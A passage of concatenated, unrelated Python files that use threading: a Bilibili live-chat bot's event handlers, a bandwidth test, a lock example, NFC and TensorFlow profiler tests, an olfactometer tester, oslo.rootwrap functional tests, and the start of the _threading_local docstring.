command_list = msg.strip(" ").split(" ")
commandSign = list(command_list[0])[0]
comm = command_list[0].strip(commandSign)
commKey = command_list[1:]
return commandSign, comm, commKey
@abstractmethod
def send_msg(self, msg):
"""
send_msg 发送弹幕\n
父类参数: self.id , self._getMsgStyle(msg)
self._getMsgStyle: 用户当前弹幕样式
self.id: 房间号
"""
return self.live.api.sendLiveMsg(self.live.id, self.live._getMsgStyle(msg))
@abstractmethod
def time_loop(self):
"""
事件 time_loop 启动定时发送
"""
self.live._time_loop()
@abstractmethod
def msg_loop(self, debug):
"""
事件 msg_loop 启动弹幕轮查
"""
self.live._msg_loop(debug)
@abstractmethod
def msg_log(self, msg):
"""
事件 msg_log 新弹幕会经过这里
"""
print("%s: %s" % (msg["userName"], msg["msg"]))
@abstractmethod
def command_log(self, code, msg, comm):
"""
事件 command_log 指令执行成功
"""
# 定时发送调用时的默认数据格式 code, None, None
if msg is None and comm is None:
if code == 0:
print('定时发送成功')
else:
print('定时发送失败... code:%s' % code)
return
print('"%s: %s" 执行成功 -> %s' % (msg["userName"], msg["msg"], comm))
@abstractmethod
def command_err_log(self, code, msg, comm):
"""
事件 command_err_log 指令执行错误
"""
print('"%s: %s" 指令执行错误 -> %s' % (msg["userName"], msg["msg"], comm))
def welcome(self, msg):
"""
事件 welcome 普通用户进入房间
"""
msg = format.welcome(msg)
print("%s 进入了房间!" % msg["userName"])
def welcome_guard(self, msg):
"""
事件 welcome_guard 老爷用户进入房间
"""
print(msg)
def entry_effect(self, msg):
"""
事件 entry_effect 舰长进入房间(不确定)
"""
msg = format.entry_effect(msg)
print(msg["copy_writing"])
def super_msg(self, msg):
"""
事件 super_msg SC留言
"""
msg = format.super_msg(msg)
print("%s发送了价值%s的SE! 时长%s: %s" % (msg["userName"], msg["price"],
msg["endTime"], msg["msg"]))
def send_gift(self, msg):
"""
事件 send_gift 投喂礼物
"""
msg = format.send_gift(msg)
print("%s%s了%s个%s!" % (msg["userName"], msg["action"], msg["num"], msg["giftName"]))
def combo_send_gift(self, msg):
"""
事件 combo_send_gift 连击投喂礼物
"""
msg = format.send_gift(msg)
print("%s连击%s了%s个%s!" % (msg["userName"], msg["action"], msg["num"], msg["giftName"]))
def send_gift_game(self, msg):
"""
事件 send_gift_game 直播游戏
"""
msg = format.send_gift(msg)
print("%s送了%s个%s!" % (msg["userName"], msg["num"], msg["giftName"]))
def anchor_lot_start(self, msg):
"""
事件 anchor_lot_start 天选之人开始
"""
print(msg)
def anchor_lot_end(self, msg):
"""
事件 anchor_lot_end 天选之人结束
"""
print(msg)
def anchor_lot_award(self, msg):
"""
事件 anchor_lot_award 天选之人结果
"""
msg, list_str = format.anchor_lot_award(msg), ""
for uesr in msg["userList"]:
list_str += uesr["uname"]
print("天选之人 %s 结果: %s" % (msg["name"], list_str))
def guard_buy(self, msg):
"""
事件 guard_buy 上舰长
"""
msg = format.guard_buy(msg)
print("%s开通了%s月%s" % (msg["userName"], msg["num"], msg["giftName"]))
def guard_renew(self, msg):
"""
事件 guard_renew 续费了舰长
"""
print(msg)
def notice_msg(self, msg):
"""
事件 notice_msg 大公告
"""
print(msg)
def activity_banner_update(self, msg):
"""
事件 activity_banner_update 小时榜变动
"""
print(msg)
def room_data_update(self, msg):
"""
事件 room_data_update 粉丝关注变动
"""
msg = format.room_data(msg)
print("关注变动! 关注数:%s 粉丝团人数:%s" % (msg["fans"], msg["fansClub"]))
def online_rank(self, msg):
"""
事件 online_rank 高能榜变更
"""
msg, data = msg['data']['list'], ""
for user in msg:
data += " %s-%s " % (user["uname"], user["score"])
print("高能榜变更! %s" % data)
def live_rank(self, msg):
"""
事件 live_rank 主播榜变更
"""
print("主播现在排在%s!" % msg["data"]["count"])
def hot_rank(self, msg):
"""
事件 hot_rank 热门榜变更
"""
msg = format.hot_rank(msg)
print("主播现在%s排在%s!" % (msg["rankDesc"], msg["rank"]))
def activity(self, msg):
"""
事件 activity 活动内容变更
我估计这里一直会变直接留空了 需要的写
"""
pass
def hot_rank_changed(self, msg):
"""
事件 hot_rank_changed 热门榜计数? (不清楚能干嘛)
"""
pass
def hot_rank_settlement(self, msg):
if msg["cmd"] == "HOT_RANK_SETTLEMENT":
return
msg = format.hot_rank_settlement(msg)
print(msg["rankDesc"])
def stop_live_room_list(self, msg):
"""
事件 stop_live_room_list 停止直播室名单 (下播名单?)
"""
pass
def popularity_update(self, popularity):
"""
事件 popularity_update 心跳回应更新人气值
"""
print("当前人气值: %s" % popularity)
def pk_battle_process(self, msg):
"""
事件 pk_battle_process pk数据
"""
print(msg)
def pk_battle_process_new(self, msg):
"""
事件 pk_battle_process_new pk数据新
"""
print(msg)
def pk_battle_process_final(self, msg):
"""
事件 pk_battle_process_final pk决赛
"""
print(msg)
def pk_battle_end(self, msg):
"""
事件 pk_battle_end pk结束
"""
print(msg)
def pk_battle_settle_user(self, msg):
"""
事件 pk_battle_settle_user pk结算
"""
print(msg)
def pk_battle_settle(self, msg):
"""
事件 pk_battle_settle pk结算
"""
print(msg)
def common_notice_danmaku(self, msg):
"""
事件 common_notice_danmaku pk连胜
"""
print(msg)
def miscellaneous(self, msg):
"""
事件 miscellaneous 未知事件全部会调用
"""
print("未知信息...")
class MsgList:
def __init__(self, msgList):
self.index = 0
self.msgList = msgList
self.data_len = len(msgList)
def __iter__(self):
return self
def __next__(self):
if self.index == self.data_len:
raise StopIteration
msg = self.msgList[self.index]
data = {
"time": msg["timeline"],
"msg": msg["text"],
"userName": msg["nickname"],
"userId": msg["uid"]
}
self.index += 1
return data
def getMsgTimeList(self):
return [msg["timeline"] for msg in self.msgList]
# Abstract command-list object
class CommandList(metaclass=ABCMeta):
def __init__(self):
self.event = None
self.purview = []
self.purviewCommand = []
self.command = {}
self.commandSign = "/"
self.timeLoopList = {}
@abstractmethod
def commandError(self):
"""
commandError 指令参数错误
"""
return self.event.send_msg("您的指令参数填错啦!")
@abstractmethod
def commandNameError(self):
"""
commandNameError 指令名字错误
"""
return self.event.send_msg("您的指令名字填错啦!")
@abstractmethod
def purviewError(self):
"""
purviewError 指令权限错误
"""
return self.event.send_msg("您的指令权限不足...")
class format:
"""
数据格式化
"""
@staticmethod
def msg(data):
"""
弹幕数据
msg: 内容
userId: 用户id
userName: 用户名
badge: 用户粉丝牌子
level: 用户直播用户等级
time: 时间
color: 弹幕颜色
"""
data = data["info"]
return {
"msg": data[1],
"userId": data[2][0],
"userName": data[2][1],
"badge": data[3],
"level": data[4][1],
"time": data[9]["ts"],
"color": data[9]["ct"],
}
@staticmethod
def send_gift(data):
"""
送礼物数据
action: 动作
giftId: 礼物id
giftName: 礼物名称
num: 送礼物数量
userName: 用户名
userId: 用户id
medal_info: 用户粉丝牌子
"""
data, cmd = data["data"], data["cmd"]
if cmd == "LIVE_INTERACTIVE_GAME":
data["medal_info"] = ""
data["action"] = ""
if cmd == "COMBO_SEND":
data["gift_num"] = data["total_num"]
if cmd == "SEND_GIFT":
return {
"action": "",
"giftId": data["giftId"],
"giftName": data["giftName"],
"num": data["num"],
"userName": data["uname"],
"userId": data["uid"],
"medal_info": data["medal_info"]
}
return {
"action": data["action"],
"giftId": data["gift_id"],
"giftName": data["gift_name"],
"num": data["gift_num"],
"userName": data["uname"],
"userId": data["uid"],
"medal_info": data["medal_info"]
}
@staticmethod
def welcome(data):
"""
普通用户进入房间数据
userName: 用户名
userId: 用户id
medal: 用户粉丝牌子
roomId: 直播间id
time: 时间
"""
data = data["data"]
return {
"userName": data["uname"],
"userId": data["uid"],
"medal": data["fans_medal"],
"roomId": data["roomid"],
"time": data["timestamp"]
}
@staticmethod
def entry_effect(data):
"""
舰长进入房间数据
copy_writing: 进入房间消息
userId: 用户id
basemap: 进入房间消息背景
face: 用户头像
privilegeType: 舰长类型
time: 时间
"""
data = data["data"]
return {
"copy_writing": data["copy_writing"],
"userId": data["uid"],
"basemap": data["basemap_url"],
"face": data["face"],
"privilegeType": data["privilege_type"],
"time": data["trigger_time"]
}
@staticmethod
def room_data(data):
"""
房间关注更新数据
roomId: 房间号
fans: 关注数
fansClub: 粉丝团人数
"""
data = data["data"]
return {
"roomId": data["roomid"],
"fans": data["fans"],
"fansClub": data["fans_club"]
}
@staticmethod
def hot_rank(data):
"""
热门榜更新数据
rank: 排名
name: 榜单名
rankDesc: 榜单简介
icon: 图标
time: 时间
"""
data = data["data"]
return {
"rank": data["rank"],
"name": data["area_name"],
"rankDesc": data["rank_desc"],
"icon": data["icon"],
"time": data["timestamp"]
}
@staticmethod
def hot_rank_settlement(data):
"""
进入限时热门榜总榜数据
rank: 排名
name: 榜单名
rankDesc: 榜单简介
icon: 图标
time: 时间
"""
return {
"rank": data["rank"],
"name": data["area_name"],
"rankDesc": data["rank_desc"],
"icon": data["icon"],
"time": data["timestamp"]
}
@staticmethod
def super_msg(data):
"""
SC留言数据
background: SC背景样式
userName: 用户名
level: 用户直播用户等级
userId: 用户id
giftId: 礼物id
giftName: 礼物名称
num: 送礼物数量
medal: 用户粉丝牌子
msg: 内容
price: 价格
time: SC开始显示时间
endTime: SC时长
"""
data, cmd = data["data"], data["cmd"]
return {
"background": {
'background_bottom_color': data["background_bottom_color"],
'background_color': data["background_color"],
'background_color_end': data["background_color_end"],
'background_color_start': data["background_color_start"],
'background_icon': data["background_icon"],
'background_image': data["background_image"],
'background_price_color': data["background_price_color"],
} if cmd != "SUPER_CHAT_MESSAGE_JPN" else {
"background_bottom_color": data["background_bottom_color"],
"background_color": data["background_color"],
'background_color_end': "",
'background_color_start': "",
"background_icon": data["background_icon"],
"background_image": data["background_image"],
"background_price_color": data["background_price_color"]
},
"userName": data["user_info"]["uname"],
"userId": data["uid"],
"level": data["user_info"]["user_level"],
"giftId": data["gift"]["gift_id"],
"giftName": data["gift"]["gift_name"],
"num": data["gift"]["num"],
"medal": data["medal_info"],
"msg": data["message"],
"price": data["price"],
"time": data["start_time"],
"endTime": data["time"]
}
@staticmethod
def my_room_guard_renew(data):
"""
自动续费舰长
userName: 用户名
icon: 图标
msgSelf: 自动续费舰长消息
roomid: 房间号
type: 舰长类型
"""
return {
"userName": data["name"],
"icon": data["side"]["head_icon"],
"msgSelf": data["msg_self"],
"roomid": data["roomid"],
"type": data["msg_type"]
}
@staticmethod
def guard_buy(data):
"""
开通舰长数据
userName: 用户名
userId: 用户id
giftName: 舰长类型
giftId: 礼物id
num: 开通月数?
time: 开始时间
endTime: 结束时间
"""
data = data["data"]
return {
"userName": data["username"],
"userId": data["uid"],
"giftName": data["gift_name"],
"giftId": data["gift_id"],
"num": data["num"],
"time": data["start_time"],
"endTime": data["end_time"]
}
@staticmethod
def anchor_lot_award(data):
"""
天选之人结果数据
name: 天选之人标题
num: 数量
image: 图片?
userList: 中奖用户名单
"""
data = data["data"]
return {
"name": data["award_name"],
"num": data["award_num"],
"image": data["award_image"],
"userList": data["award_users"],
}
class LiveLog(metaclass=ABCMeta):
def __init__(self, save_in="./log"):
self.__terminal = sys.stdout
self.save_in = save_in
self.__save_in_obj = None
self.save_in_load = False
self.lock = Lock()
self.__set_log_path = self.set_log_path()
sys.stdout = self
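        # from here on every print() goes through self.write(), which timestamps
        # the text and tees it to both the original stdout and the log file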
def __save_in_open(self):
if not os.path.isdir(self.save_in):
os.makedirs(self.save_in)
if not self.save_in_load:
self.__save_in_obj = open(self.__set_log_path, "a", encoding="utf-8")
self.save_in_load = True
def __save_in_close(self):
if self.save_in_load:
self.__save_in_obj.close()
self.save_in_load = False
@abstractmethod
def set_log_path(self):
return time.strftime(f"{self.save_in}/log_%Y_%m_%d_%H_%M_%S.txt", time.localtime())
@abstractmethod
def set_log_style(self, log):
log_time = time.strftime("%H:%M:%S", time.localtime())
log_msg = "[%s] %s" % (log_time, log)
return log_msg
def write(self, log):
self.__save_in_open()
if log == "":
return
self.lock.acquire()
if log != "\n":
log = self.set_log_style(log)
if self.save_in_load:
self.__save_in_obj.write(log)
self.__terminal.write(log)
self.__save_in_close()
self.lock.release()
def flush(self):
self.__terminal.flush()
|
tc_test.py
|
#!/usr/bin/env python
import sys, random, time, string
# overload socket.create_connection
import socket
real_create_conn = socket.create_connection
def set_src_addr(*args):
address, timeout = args[0], args[1]
source_address = ('1.0.0.1', 0)
return real_create_conn(address, timeout, source_address)
socket.create_connection = set_src_addr
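# The monkey-patch above makes every connection opened through
# socket.create_connection (including those made by `requests` below) bind to
# the local source address 1.0.0.1, presumably so traffic-control rules keyed
# on that source IP also apply to the HTTP test.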
import requests
from threading import Thread
client_addr = ('1.0.0.1', 0)
server_addr = ('3.0.0.1', random.randrange(1025,3000))
def client_to_webserver():
print 'starting web test'
for i in xrange(10):
sys.stdout.write('sending request...')
sys.stdout.flush()
start = time.time()
r = requests.get('http://3.0.0.1:8080/vod/1000Seg1-Frag2')
end = time.time()
cl = int(r.headers['content-length'])
print 'BW: %d Kbps' % (int((cl*8 / float(1000)) / (end-start)))
def client_test():
print 'starting direct tc test'
client = socket.socket()
client.bind(client_addr)
client.connect(server_addr)
REQUEST_SIZE = 4096
try:
for i in xrange(10):
start = time.time()
client.sendall(str(REQUEST_SIZE))
resp = client.recv(REQUEST_SIZE+10)
#print 'got back %d bytes' % len(resp)
if len(resp) == 0: break
end = time.time()
print 'BW: %d Kbps' % (int((REQUEST_SIZE*8 / float(1000)) / (end-start)))
finally:
client.close()
def gen_random_string(size):
return ''.join(random.choice(string.ascii_letters + string.digits) for x in range(size))
def server_test():
server = socket.socket()
server.bind(server_addr)
server.listen(5)
data = ''
try:
while True:
try:
(client_socket, client_information) = server.accept()
except:
server.close()
break
# serve this client only until it disconnects
while True:
try:
msg = client_socket.recv(4096)
requested_size = int(msg)
#print 'Returning %i bytes' % requested_size
                    if len(data) != requested_size:
data = gen_random_string(requested_size)
client_socket.sendall(data)
except Exception, e:
client_socket.close()
break
break
finally:
server.close()
def local_test():
s_t = Thread(target=server_test)
s_t.start()
time.sleep(1)
c_t = Thread(target=client_test)
c_t.start()
c_t.join()
s_t.join()
def web_test():
client_to_webserver()
local_test()
web_test()
|
Chap10_Example10.31.py
|
from threading import *
class abc:
def __init__(self, seat_available):
self.seat_available = seat_available
self.mylock = Lock()
def abc_reserveseat(self, seat_required):
        self.mylock.acquire()  # block until the lock is free so release() below is always safe
print("Number of seats remaining : ", self.seat_available)
if self.seat_available >= seat_required:
print(f"{current_thread().name} was alloted the seat No. L{self.seat_available}")
self.seat_available = self.seat_available - 1
else:
print("All the seats are booked now Sorry !")
self.mylock.release()
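    # A more idiomatic sketch of the same critical section, for reference:
    #     with self.mylock:
    #         ...check and decrement seat_available...
    # the context manager acquires the lock on entry and releases it on exit,
    # even if the body raises.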
obj_abc = abc(2)
myt1 = Thread(target=obj_abc.abc_reserveseat, args=(1,), name='Saurabh')
myt2 = Thread(target=obj_abc.abc_reserveseat, args=(1,), name='Nilesh')
myt3 = Thread(target=obj_abc.abc_reserveseat, args=(1,), name='Divya')
myt1.start()
myt2.start()
myt3.start()
|
NFCPair1.py
|
# -*- coding: utf-8 -*-
import threading, time, sys
from src.steps.LoginAndLogout import LoginAndLogout
from src.steps.AddWirelessUser import AddWirelessUser
from src.steps.ChangeWifi import ChangeWifi
from src.utils.serport import serport
from src.utils.LogUtil import LogUtil
from src.utils.LogPath import Path
def transferArgv():
if len(sys.argv) < 2:
print("Invalid parameters,please enter 1 parameter!")
exit()
PairTimes = sys.argv[1]
return PairTimes
class NFCPair1:
def __init__(self):
self.Log_file = Path().getLogPath('NFCPair1')
self.NFClog_file = Path().getNFCLogPath('NFC')
LogUtil.log(self.Log_file, "Start NFCPair1 test !!!")
        # trainer login
LoginAndLogout().loginTrainer()
self.match_state = None
def SaveLog(self):
while serport.is_open:
serport.write(b'\r$EMD9\r')
time.sleep(1)
serport.write(b'\r$EMD4\r')
time.sleep(1)
data = serport.readline()
LogUtil.nfcLog(self.NFClog_file, repr(data))
def NFCPairing(self, pairTimes):
n = 0
for x in range(int(pairTimes)):
AddWirelessUser().clickAdd()
while AddWirelessUser().chooseWirelessMode():
n += 1
LogUtil.log(self.Log_file, "NFC Pairing failed !!! Failed counter: " + str(n))
LogUtil.log(self.Log_file, "NFC Pairing succeed !!! Succeed counter: " + str(x))
LogUtil.log(self.Log_file, "Change wifi id :" + str(x))
ChangeWifi().changeWifi()
serport.close()
def thread(self, pairTimes):
t1 = threading.Thread(target=self.SaveLog)
t1.start()
        t2 = threading.Thread(target=self.NFCPairing, args=(pairTimes,))
t2.start()
t2.join()
def run(self, pairTimes, times):
self.thread(pairTimes)
if __name__ == "__main__":
NFCPair1().run(1, 0)
# driver.quit()
|
profiler_api_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf 2.x profiler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import os
import threading
import portpicker
from tensorflow.python.distribute import collective_all_reduce_strategy as collective_strategy
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.profiler import profiler_client
from tensorflow.python.profiler import profiler_v2 as profiler
from tensorflow.python.profiler.integration_test import mnist_testing_utils
def _model_setup():
"""Set up a MNIST Keras model for testing purposes.
Builds a MNIST Keras model and returns model information.
Returns:
    A tuple of (batch_size, steps, train_dataset, model)
"""
context.set_log_device_placement(True)
batch_size = 64
steps = 2
with collective_strategy.CollectiveAllReduceStrategy().scope():
# TODO(b/142509827): In rare cases this errors out at C++ level with the
# "Connect failed" error message.
train_ds, _ = mnist_testing_utils.mnist_synthetic_dataset(batch_size, steps)
model = mnist_testing_utils.get_mnist_model((28, 28, 1))
return batch_size, steps, train_ds, model
def _make_temp_log_dir(test_obj):
return test_obj.get_temp_dir()
class ProfilerApiTest(test_util.TensorFlowTestCase):
def _check_tools_pb_exist(self, logdir):
expected_files = [
'overview_page.pb',
'input_pipeline.pb',
'tensorflow_stats.pb',
'kernel_stats.pb',
]
for file in expected_files:
path = os.path.join(logdir, 'plugins/profile/*/*{}'.format(file))
self.assertEqual(1, len(glob.glob(path)),
'Expected one path match: ' + path)
def test_single_worker_no_profiling(self):
"""Test single worker without profiling."""
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
def test_single_worker_sampling_mode(self):
"""Test single worker sampling mode."""
def on_worker(port):
logging.info('worker starting server on {}'.format(port))
profiler.start_server(port)
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
port = portpicker.pick_unused_port()
thread = threading.Thread(target=on_worker, args=(port,))
thread.start()
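    # Sampling mode: the worker thread above starts a profiler server on `port`;
    # profiler_client.trace() below then requests a 3-second trace from that
    # server while the model is training.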
# Request for 3 seconds of profile.
duration_ms = 3000
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=0,
device_tracer_level=1,
)
profiler_client.trace('localhost:{}'.format(port), logdir, duration_ms, '',
3, options)
thread.join(30)
self._check_tools_pb_exist(logdir)
def test_single_worker_programmatic_mode(self):
"""Test single worker programmatic mode."""
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=2,
python_tracer_level=0,
device_tracer_level=1,
)
profiler.start(logdir, options)
_, steps, train_ds, model = _model_setup()
model.fit(x=train_ds, epochs=2, steps_per_epoch=steps)
profiler.stop()
self._check_tools_pb_exist(logdir)
if __name__ == '__main__':
multi_process_runner.test_main()
|
PID_reader.py
|
import time
import threading
from random import seed
from random import random
from IPython.display import display
import math
class PID_Tester:
def __init__(self, ui=False, smell_engine=False, PID_MODE=False, cont_read_conc=False,sampling_rate=50):
self.ui = ui
self.smell_engine = smell_engine
self.PID_MODE = PID_MODE
self.smell_engine.smell_controller.valve_driver.PID_MODE = PID_MODE
self.cont_read_conc = cont_read_conc
self.seed = seed(1)
self.sampling_rate = sampling_rate
def read_concentration_values(self):
concentration_mixtures = self.ui.odorConcentrationValues() # Read in user-specified concentrations
print(concentration_mixtures)
self.smell_engine.set_desired_concentrations(concentration_mixtures) # Assign target concentrations
def timer_setup(self, interval=None):
"""
Configuration of thread instance.
Thread runs at a user-defined time interval to which it issues commands to hardware.
Args:
            interval (float): Rate at which the thread executes write commands to the olfactometer.
"""
if interval is None:
try:
interval = (0.5 / self.frames_per_s)
except:
interval = 0.1
self.timer_interval = interval
self.timer_paused = False
self.timer_thread = threading.Thread(target=self.timer_run, args=())
self.timer_thread.daemon = True
def timer_start(self):
"""
Starts thread instance.
"""
print("Thread started")
self.timer_thread.start()
def timer_run(self):
"""
The 'update' method for the thread instance. Writes digital valve states
to olfactometer at the defined timer_interval rate.
        If writing values is unsuccessful, the thread instance halts.
"""
while self.timer_interval: # While the timer is valid
if not self.timer_paused: # Try and write the data
time.sleep(self.timer_interval)
# IF RUNNING FOR PID TESTS
if (self.PID_MODE):
# if (self.cont_read_conc):
# self.read_concentration_values()
self.ui.timeSeriesUpdate(self.smell_engine.smell_controller.valve_driver.PID_sensor_readings,
10*self.sampling_rate)
# print("Thread running")
else:
time.sleep(self.timer_interval)
def timer_pause(self):
"""
Halts thread instance.
"""
self.timer_paused = True
def timer_resume(self):
"""
Continues thread after being paused.
"""
self.timer_paused = False
def timer_stop(self):
"""
        Pauses thread, turns off all valves, ends defined virtual communication,
and releases Task object instance from memory.
"""
self.timer_pause()
|
test_functional.py
|
# Copyright (c) 2014 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import io
import logging
import os
import pwd
import shutil
import signal
import sys
import threading
import time
try:
import eventlet
except ImportError:
eventlet = None
import fixtures
import mock
import six
import testtools
from testtools import content
from oslo_rootwrap import client
from oslo_rootwrap import cmd
from oslo_rootwrap import subprocess
from oslo_rootwrap.tests import run_daemon
class _FunctionalBase(object):
def setUp(self):
super(_FunctionalBase, self).setUp()
tmpdir = self.useFixture(fixtures.TempDir()).path
self.config_file = os.path.join(tmpdir, 'rootwrap.conf')
self.later_cmd = os.path.join(tmpdir, 'later_install_cmd')
filters_dir = os.path.join(tmpdir, 'filters.d')
filters_file = os.path.join(tmpdir, 'filters.d', 'test.filters')
os.mkdir(filters_dir)
with open(self.config_file, 'w') as f:
f.write("""[DEFAULT]
filters_path=%s
daemon_timeout=10
exec_dirs=/bin""" % (filters_dir,))
with open(filters_file, 'w') as f:
f.write("""[Filters]
echo: CommandFilter, /bin/echo, root
cat: CommandFilter, /bin/cat, root
sh: CommandFilter, /bin/sh, root
id: CommandFilter, /usr/bin/id, nobody
unknown_cmd: CommandFilter, /unknown/unknown_cmd, root
later_install_cmd: CommandFilter, %s, root
""" % self.later_cmd)
def _test_run_once(self, expect_byte=True):
code, out, err = self.execute(['echo', 'teststr'])
self.assertEqual(0, code)
if expect_byte:
expect_out = b'teststr\n'
expect_err = b''
else:
expect_out = 'teststr\n'
expect_err = ''
self.assertEqual(expect_out, out)
self.assertEqual(expect_err, err)
def _test_run_with_stdin(self, expect_byte=True):
code, out, err = self.execute(['cat'], stdin=b'teststr')
self.assertEqual(0, code)
if expect_byte:
expect_out = b'teststr'
expect_err = b''
else:
expect_out = 'teststr'
expect_err = ''
self.assertEqual(expect_out, out)
self.assertEqual(expect_err, err)
def test_run_command_not_found(self):
code, out, err = self.execute(['unknown_cmd'])
self.assertEqual(cmd.RC_NOEXECFOUND, code)
def test_run_unauthorized_command(self):
code, out, err = self.execute(['unauthorized_cmd'])
self.assertEqual(cmd.RC_UNAUTHORIZED, code)
def test_run_as(self):
if os.getuid() != 0:
self.skip('Test requires root (for setuid)')
# Should run as 'nobody'
code, out, err = self.execute(['id', '-u'])
self.assertEqual('%s\n' % pwd.getpwnam('nobody').pw_uid, out)
# Should run as 'root'
code, out, err = self.execute(['sh', '-c', 'id -u'])
self.assertEqual('0\n', out)
class RootwrapTest(_FunctionalBase, testtools.TestCase):
def setUp(self):
super(RootwrapTest, self).setUp()
self.cmd = [
sys.executable, '-c',
'from oslo_rootwrap import cmd; cmd.main()',
self.config_file]
def execute(self, cmd, stdin=None):
proc = subprocess.Popen(
self.cmd + cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
out, err = proc.communicate(stdin)
self.addDetail('stdout',
content.text_content(out.decode('utf-8', 'replace')))
self.addDetail('stderr',
content.text_content(err.decode('utf-8', 'replace')))
return proc.returncode, out, err
def test_run_once(self):
self._test_run_once(expect_byte=True)
def test_run_with_stdin(self):
self._test_run_with_stdin(expect_byte=True)
class RootwrapDaemonTest(_FunctionalBase, testtools.TestCase):
def assert_unpatched(self):
# We need to verify that these tests are run without eventlet patching
if eventlet and eventlet.patcher.is_monkey_patched('socket'):
self.fail("Standard library should not be patched by eventlet"
" for this test")
def setUp(self):
self.assert_unpatched()
super(RootwrapDaemonTest, self).setUp()
# Collect daemon logs
daemon_log = io.BytesIO()
p = mock.patch('oslo_rootwrap.subprocess.Popen',
run_daemon.forwarding_popen(daemon_log))
p.start()
self.addCleanup(p.stop)
# Collect client logs
client_log = six.StringIO()
handler = logging.StreamHandler(client_log)
log_format = run_daemon.log_format.replace('+', ' ')
handler.setFormatter(logging.Formatter(log_format))
logger = logging.getLogger('oslo_rootwrap')
logger.addHandler(handler)
logger.setLevel(logging.DEBUG)
self.addCleanup(logger.removeHandler, handler)
# Add all logs as details
@self.addCleanup
def add_logs():
self.addDetail('daemon_log', content.Content(
content.UTF8_TEXT,
lambda: [daemon_log.getvalue()]))
self.addDetail('client_log', content.Content(
content.UTF8_TEXT,
lambda: [client_log.getvalue().encode('utf-8')]))
# Create client
self.client = client.Client([
sys.executable, run_daemon.__file__,
self.config_file])
# _finalize is set during Client.execute()
@self.addCleanup
def finalize_client():
if self.client._initialized:
self.client._finalize()
self.execute = self.client.execute
def test_run_once(self):
self._test_run_once(expect_byte=False)
def test_run_with_stdin(self):
self._test_run_with_stdin(expect_byte=False)
def test_run_with_later_install_cmd(self):
code, out, err = self.execute(['later_install_cmd'])
self.assertEqual(cmd.RC_NOEXECFOUND, code)
# Install cmd and try again
shutil.copy('/bin/echo', self.later_cmd)
code, out, err = self.execute(['later_install_cmd'])
        # Expect the cmd to run successfully
self.assertEqual(0, code)
    def test_daemon_resurrection(self):
# Let the client start a daemon
self.execute(['cat'])
# Make daemon go away
os.kill(self.client._process.pid, signal.SIGTERM)
# Expect client to successfully restart daemon and run simple request
self.test_run_once()
def test_daemon_timeout(self):
# Let the client start a daemon
self.execute(['echo'])
# Make daemon timeout
with mock.patch.object(self.client, '_restart') as restart:
time.sleep(15)
self.execute(['echo'])
restart.assert_called_once()
def _exec_thread(self, fifo_path):
try:
# Run a shell script that signals calling process through FIFO and
# then hangs around for 1 sec
self._thread_res = self.execute([
'sh', '-c', 'echo > "%s"; sleep 1; echo OK' % fifo_path])
except Exception as e:
self._thread_res = e
def test_graceful_death(self):
# Create a fifo in a temporary dir
tmpdir = self.useFixture(fixtures.TempDir()).path
fifo_path = os.path.join(tmpdir, 'fifo')
os.mkfifo(fifo_path)
# Start daemon
self.execute(['cat'])
# Begin executing shell script
t = threading.Thread(target=self._exec_thread, args=(fifo_path,))
t.start()
# Wait for shell script to actually start
with open(fifo_path) as f:
f.readline()
# Gracefully kill daemon process
os.kill(self.client._process.pid, signal.SIGTERM)
# Expect daemon to wait for our request to finish
t.join()
if isinstance(self._thread_res, Exception):
raise self._thread_res # Python 3 will even provide nice traceback
code, out, err = self._thread_res
self.assertEqual(0, code)
self.assertEqual('OK\n', out)
self.assertEqual('', err)
@contextlib.contextmanager
def _test_daemon_cleanup(self):
# Start a daemon
self.execute(['cat'])
socket_path = self.client._manager._address
# Stop it one way or another
yield
process = self.client._process
stop = threading.Event()
# Start background thread that would kill process in 1 second if it
# doesn't die by then
def sleep_kill():
stop.wait(1)
if not stop.is_set():
os.kill(process.pid, signal.SIGKILL)
threading.Thread(target=sleep_kill).start()
# Wait for process to finish one way or another
self.client._process.wait()
# Notify background thread that process is dead (no need to kill it)
stop.set()
# Fail if the process got killed by the background thread
self.assertNotEqual(-signal.SIGKILL, process.returncode,
"Server haven't stopped in one second")
# Verify that socket is deleted
self.assertFalse(os.path.exists(socket_path),
"Server didn't remove its temporary directory")
def test_daemon_cleanup_client(self):
# Run _test_daemon_cleanup stopping daemon as Client instance would
# normally do
with self._test_daemon_cleanup():
self.client._finalize()
def test_daemon_cleanup_signal(self):
# Run _test_daemon_cleanup stopping daemon with SIGTERM signal
with self._test_daemon_cleanup():
os.kill(self.client._process.pid, signal.SIGTERM)
|
_threading_local.py
|
"""Thread-local objects
(Note that this module provides a Python version of the
threading.local class. Depending on the version of Python you're
using, there may be a faster one available. You should always import
the local class from threading.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
